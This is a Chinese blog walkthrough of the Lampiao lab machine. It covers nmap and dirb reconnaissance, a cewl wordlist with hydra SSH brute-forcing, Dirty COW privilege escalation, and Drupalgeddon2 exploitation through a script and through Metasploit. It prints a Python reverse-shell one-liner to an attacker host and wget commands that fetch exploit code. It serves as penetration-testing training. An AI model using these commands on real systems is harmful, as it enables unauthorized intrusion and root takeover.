【原创】项目二Lampiao

实战流程

1,nmap扫描C段

┌──(root㉿heiyu)-[/home/whoami]
└─# nmap -sP 192.168.186.0/24
Starting Nmap 7.92 ( https://nmap.org ) at 2022-05-24 03:34 EDT
Nmap scan report for 192.168.186.139 (192.168.186.139)
Host is up (0.00031s latency).

2,找到靶机,进行进一步扫描,发现目标计算机上有三个可用的开放端口22、80、1898端口

┌──(root㉿heiyu)-[/home/whoami]
└─# nmap -p-  192.168.186.139

image-20220526102703098

3,信息枚举:http://10.211.55.9:1898/ -> Read more 发现改页面信息:

image-20220524172106935

http://10.211.55.9:1898/?q=node/2
页面发现:
audio.m4a:语音获得用户名:tiago
qrc.png:图片二维码扫描获得信息,需要爆破

4,爆破网站目录

┌──(root㉿heiyu)-[/home/whoami]
└─# dirb http://192.168.186.139:1898

获得url:http://10.211.55.9:1898/robots.txt

image-20220526102056952

继续枚举获得:http://10.211.55.9:1898/CHANGELOG.txt

image-20220526102145931

发现是:Drupal 7.54, 2017-02-01

image-20220526102214215

4、获取密码字典:cewl:通过爬行网站获取关键信息创建一个密码字典

cewl http://192.168.186.139:1898/?q=node/1 -w heiyu.txt

image-20220526102451355

5、hydra爆破

hydra -l tiago -P heiyu.txt 192.168.186.139 ssh

image-20220526102855450

先利用cewl来生成一份结合网站目标的社工性质的密码字典、不理解的可以搜索网上搜索cewl学习,然后九头蛇暴力破解得到用户密码:
[22][ssh] host: 10.211.55.9   login: tiago   password: Virgulino

用户: tiago
密码: Virgulino

6、登录ssh

ssh tiago@192.168.186.139

image-20220526104049807

发现是低权限用户!需要提权!

版本信息如下

image-20220526104752192

7、提权

https://github.com/mzet-/linux-exploit-suggester

下载提权文件

proxychains wget https://raw.githubusercontent.com/mzet-/linux-exploit-suggester/master/linux-exploit-suggester.sh -O les.sh

开启web服务image-20220526135240830

在目标服务器上下载les.sh文静

wget http://192.168.186.130:8081/les.sh

追加执行权限

chmod +x les.sh

执行文件后会列出可以用于该linux服务器上提权的方法

./les.sh

image-20220526140516814

使用其中的脏牛提权

image-20220526141145521

搜索kali自带的exploit

image-20220526142957047

谷歌搜索40847的具体用法

https://www.exploit-db.com/exploits/40847

// EDB-Note: Compile:   g++ -Wall -pedantic -O2 -std=c++11 -pthread -o dcow 40847.cpp -lutil
// EDB-Note: Recommended way to run:   ./dcow -s 

把40847.cpp文件复制到poc中(因为这个文件夹开了网络服务)

┌──(root㉿heiyu)-[/home/whoami]
└─# cp /usr/share/exploitdb/exploits/linux/local/40847.cpp /home/whoami/poc

目标机器下载40847.cpp

wget http://192.168.186.130:8081/40847.cpp

执行cpp文件,生成可执行文件heiyu

g++ -Wall -pedantic -O2 -std=c++11 -pthread -o heiyu 40847.cpp -lutil

-Wall 一般使用该选项,允许发出GCC能够提供的所有有用的警告
-pedantic 允许发出ANSI/ISO C标准所列出的所有警告
-O2编译器的优化选项的4个级别,-O0表示没有优化,-O1为缺省值,-O3优化级别最高
-std=c++11就是用按C++2011标准来编译的
-pthread 在Linux中要用到多线程时,需要链接pthread库
-o dcow gcc生成的目标文件,名字为dcow
执行gcc编译可执行文件,可直接提权。

执行heiyu

./heiyu

image-20220526145024667

获得root的密码

Root password is:   dirtyCowFun

重新链接ssh

┌──(root㉿heiyu)-[/home/whoami/poc]
└─# ssh root@192.168.186.139

root登录成功

image-20220526145301080

获取flag成功

root@lampiao:~# cat flag.txt
9740616875908d91ddcdaa8aea3af366

思路拓展1--Xray一条龙

1、通过AWVS+xray跑出了poc:poc-yaml-drupal-cve-2018-7600-rce
那么Xray是给出了两篇poc的文章:
https://github.com/dreadlocked/Drupalgeddon2
https://paper.seebug.org/567/

image-20220526152539269

通过文章查看,Drupalgeddon2有poc都是rb运行文件,下载!

proxychains git clone https://github.com/dreadlocked/Drupalgeddon2.git

安装模块,用来排错

sudo gem install highline

安装完highline后即可执行

./drupalgeddon2.rb http://192.168.186.139:1898/

脚本很强大,通过服务器7.54版本的漏洞,直接在网站的根目录写了个shell

image-20220526153549103

此时已经获取的这个shell,正向shell

image-20220526153751251

由于该shell不能执行g++,并且实战中有防火墙的原因,正向shell一般不稳定,因此尝试通过反弹shell获取链接

本机开启6666端口

image-20220526160224113

目标机开启反弹shell脚本

python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("192.168.186.130",6666));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);'

获取反弹shell

image-20220526162100247

补齐shell弹框

python -c 'import pty; pty.spawn("/bin/bash")'

下载提权文件

wget http://192.168.186.130:8081/40847.cpp

编译提权文件

g++ -Wall -pedantic -O2 -std=c++11 -pthread -o 40847 40847.cpp -lutil

执行提权可执行文件

./40847

拓展思路2-Metasplit

谷歌搜索:Drupal 7.54 exploit

# [CVE-2018-7600] Drupal <= 8.5.0 / <= 8.4.5 / <= 8.3.8 / 7.23 <= 7.57 - 'Drupalgeddon2' (SA-CORE-2018-002) ~ https://github.com/dreadlocked/Drupalgeddon2/
msfconsole

使用exploit/unix/webapp/drupal_drupalgeddon2

image-20220526154030113

显示条件信息

 show options

image-20220526154206334

set RHOSTS 192.168.186.139
set RPORT 1898
run

此时获取了了伪shell

image-20220526154601254

进行shell的补齐

meterpreter > shell
python -c 'import pty; pty.spawn("/bin/bash")'

此时获取稳定shell

image-20220526154815579

提权

上传提权文件,后面跟之前的方式一样

meterpreter > upload /home/whoami/poc/les.sh /tmp/

脑图

项目2

posted @ 2022-05-26 17:59  黑羽heiyu  阅读(148)  评论(0编辑  收藏  举报